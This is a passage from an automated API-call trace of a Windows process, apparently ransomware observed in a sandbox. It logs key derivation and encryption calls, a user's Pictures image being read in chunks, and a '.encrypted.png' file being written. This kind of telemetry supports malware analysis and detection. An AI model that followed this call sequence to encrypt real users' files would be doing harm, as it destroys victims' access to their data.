dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.556] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.556] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0039.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.556] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.556] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.556] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0039.556] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.556] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0039.556] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.556] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.557] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0039.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.557] CryptDestroyHash (hHash=0x7c2100) returned 1 [0039.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.557] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.557] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0039.557] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0039.557] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kmze-_jdzks16w.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.557] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.557] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0039.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0039.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0039.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0039.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.558] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0039.558] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0039.558] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0039.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0039.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0039.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0039.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0039.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0039.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0039.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0039.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0039.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0039.559] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0039.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0039.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0039.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0039.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.560] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.encrypted.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kmze-_jdzks16w.encrypted.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0039.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0039.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0039.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.560] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0039.561] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0039.561] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0039.561] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0039.562] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0039.562] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0039.564] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x5c26, lpOverlapped=0x0) returned 1 [0039.564] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0039.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15c26) returned 0xac0018 [0039.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0039.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0039.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0039.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15c26) returned 0x935008 [0039.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.567] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15c26) returned 0xac0018 [0039.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0039.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.569] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0039.569] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.570] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0039.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15c26) returned 0xac0018 [0039.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0039.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0039.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0039.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce20 [0039.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0039.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0039.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0039.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15c26) returned 0x94ac38 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0039.572] RtlAllocateHeap 